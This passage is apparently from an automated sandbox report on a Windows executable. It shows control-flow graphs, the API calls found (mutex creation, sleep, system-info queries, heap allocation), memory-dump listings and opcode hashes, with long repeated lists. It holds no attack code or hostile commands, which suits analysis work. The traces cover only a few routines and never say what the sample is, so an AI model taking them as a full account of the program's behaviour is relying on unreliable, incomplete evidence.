                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: d961b278019fbe9e4e46904b45a25a6f0befba3bd0bb16a23e421e725ffd9413
                                                                                                                                                                                                                                • Instruction ID: b2553ebaec25046f8996adf11e515336b9d7b66ecd5d01aa442db866f8ca7c9c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d961b278019fbe9e4e46904b45a25a6f0befba3bd0bb16a23e421e725ffd9413
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6213031344101DAFB246768984677F73A6DF83302F244F16ED08D63D2CF7A558992A3

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 502 5a34f-5a35b 503 5a371-5a39a call 6d663 502->503 504 5a35d-5a36b 502->504 510 5a39c-5a3a8 503->510 511 5a3c8-5a916 call 680c0 503->511 504->503 505 5a93a 504->505 507 5a953-5a994 Sleep CreateMutexA 505->507 508 5a93a call 86c6a 505->508 518 5a9a7-5a9a8 507->518 519 5a996-5a998 507->519 508->507 514 5a3be-5a3c5 call 6d663 510->514 515 5a3aa-5a3b8 510->515 514->511 515->505 515->514 519->518 522 5a99a-5a9a5 519->522 522->518
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0005A963
                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,000B3254), ref: 0005A981
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                • Opcode ID: 148c45a5899c8476fb2a3a29bfbaa8ff0cfa6046e2f8126b3d73e01f29dae6d6
                                                                                                                                                                                                                                • Instruction ID: 36cd4e0386293b2cd34ad454ed5f8c767f2d96bc52515be4a1583d97cd51768a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 148c45a5899c8476fb2a3a29bfbaa8ff0cfa6046e2f8126b3d73e01f29dae6d6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1217C317042409BEB189B6CEC8576EB7A2DBD3316F244719F808DB3D5CB75A6848363

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 561 57d30-57db2 call 840f0 565 58356-58373 call 6cff1 561->565 566 57db8-57de0 call 67a00 call 55c10 561->566 573 57de4-57e06 call 67a00 call 55c10 566->573 574 57de2 566->574 579 57e08 573->579 580 57e0a-57e23 573->580 574->573 579->580 583 57e25-57e34 580->583 584 57e54-57e7f 580->584 585 57e36-57e44 583->585 586 57e4a-57e51 call 6d663 583->586 587 57e81-57e90 584->587 588 57eb0-57ed1 584->588 585->586 591 58374 call 86c6a 585->591 586->584 593 57ea6-57ead call 6d663 587->593 594 57e92-57ea0 587->594 589 57ed7-57edc 588->589 590 57ed3-57ed5 GetNativeSystemInfo 588->590 595 57edd-57ee6 589->595 590->595 602 58379-5837f call 86c6a 591->602 593->588 594->591 594->593 600 57f04-57f07 595->600 601 57ee8-57eef 595->601 606 582f7-582fa 600->606 607 57f0d-57f16 600->607 604 57ef5-57eff 601->604 605 58351 601->605 609 5834c 604->609 605->565 606->605 612 582fc-58305 606->612 610 57f29-57f2c 607->610 611 57f18-57f24 607->611 609->605 614 582d4-582d6 610->614 615 57f32-57f39 610->615 611->609 616 58307-5830b 612->616 617 5832c-5832f 612->617 620 582e4-582e7 614->620 621 582d8-582e2 614->621 622 57f3f-57f9b call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 615->622 623 58019-582bd call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 call 67a00 call 55c10 call 67a00 call 55c10 call 55d50 call 67a00 call 55c10 call 55730 615->623 624 58320-5832a 616->624 625 5830d-58312 616->625 618 58331-5833b 617->618 619 5833d-58349 617->619 618->605 619->609 620->605 627 582e9-582f5 620->627 621->609 646 57fa0-57fa7 622->646 659 582c3-582cc 623->659 624->605 625->624 629 58314-5831e 625->629 627->609 629->605 648 57fa9 646->648 649 57fab-57fcb call 88bbe 646->649 648->649 656 58002-58004 649->656 657 57fcd-57fdc 649->657 656->659 660 5800a-58014 656->660 661 57ff2-57fff call 6d663 657->661 662 57fde-57fec 657->662 659->606 664 582ce 659->664 660->659 661->656 662->602 662->661 664->614
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00057ED3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                • Opcode ID: bb70bf1384740da285a018fab91cd7720094c6d86a71d12d49e080b121c9d4b9
                                                                                                                                                                                                                                • Instruction ID: 23725398ebae966e8ade7a2ad18f3a97d97ffd23564a69dc0eb996b3b7e9114a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb70bf1384740da285a018fab91cd7720094c6d86a71d12d49e080b121c9d4b9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71E1E370E006449BDB24BB68CC1B3DE7A62AB41725F94469CEC196B3C3DB355F8887C2

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 860 8d82f-8d83a 861 8d848-8d84e 860->861 862 8d83c-8d846 860->862 864 8d850-8d851 861->864 865 8d867-8d878 RtlAllocateHeap 861->865 862->861 863 8d87c-8d887 call 875f6 862->863 871 8d889-8d88b 863->871 864->865 866 8d87a 865->866 867 8d853-8d85a call 89dc0 865->867 866->871 867->863 873 8d85c-8d865 call 88e36 867->873 873->863 873->865
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0008A813,00000001,00000364,00000006,000000FF,?,0008EE3F,?,00000004,00000000,?,?), ref: 0008D871
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
